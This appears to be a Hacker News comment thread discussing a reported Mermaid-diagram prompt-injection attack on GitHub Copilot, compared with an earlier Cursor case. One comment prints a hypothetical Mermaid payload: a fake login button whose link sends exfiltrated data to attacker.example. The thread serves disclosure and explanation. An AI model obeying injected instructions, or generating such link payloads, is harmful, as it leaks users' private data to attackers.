What a shame. There are probably LOTS of vulns in Copilot. This just discourages researchers and responsible disclosure, likely leaving Copilot very insecure in the long run.
Probably exactly why they "determined" it to be out of scope :)
If I write var blah = 5*5; in code, I know the answer is always 35. But if I ask an LLM, it seems like the answer could be anything from correct to any incorrect number one could dream up.
We saw this at work with the seahorse emoji question. A variety of [slightly] different answers.
I greatly enjoy the irony here.
Which points to just how much unlicensed copyrighted material is in LLM training sets (whether fair use or not).
i love the use of all capitals for emphasis on important instructions in the malicious prompt. it's almost like an enthusiastic leader of a criminal gang explaining the plot in a dingy diner the night before, as the rain pours outside.
simonw•2h ago
This isn't the first Mermaid prompt injection exfiltration we've seen - here's one from August that was reported by Johann Rehberger against Cursor (and fixed by them): https://embracethered.com/blog/posts/2025/cursor-data-exfilt...
That's mentioned in the linked post. Looks like that attack was different - Cursor's Mermaid implementation could render external images, but Copilot's doesn't let you do that, so you need to trick users with a fake Login button that activates a hyperlink instead.
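For anyone curious what that looks like, here's a rough hypothetical sketch of such a payload (the URL, label, and styling are invented for illustration, not taken from the actual PoC): a flowchart node dressed up as a login button, with Mermaid's click directive attaching the attacker's hyperlink:

    %% Hypothetical payload sketch, not the PoC from the post. A node is
    %% styled to look like a login button, and Mermaid's "click" directive
    %% turns it into a hyperlink. The query string is where the injected
    %% instructions would tell the model to embed the data being exfiltrated.
    flowchart TD
        login["Sign in to view this diagram"]
        click login "https://attacker.example/collect?d=<exfiltrated-data>" "Log in"
        style login fill:#2da44e,color:#ffffff

Whether the link actually activates depends on how the host configures Mermaid's securityLevel (strict mode disables click interactions), which is presumably the knob these renderers have to get right.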
luke-stanley•2h ago
Thanks for the archive link and the very useful term BTW! I also got a 503 when trying to visit.
simonw•2h ago
The first AI lab to solve unrelated instruction following is going to have SUCH a huge impact.
hshdhdhehd•1h ago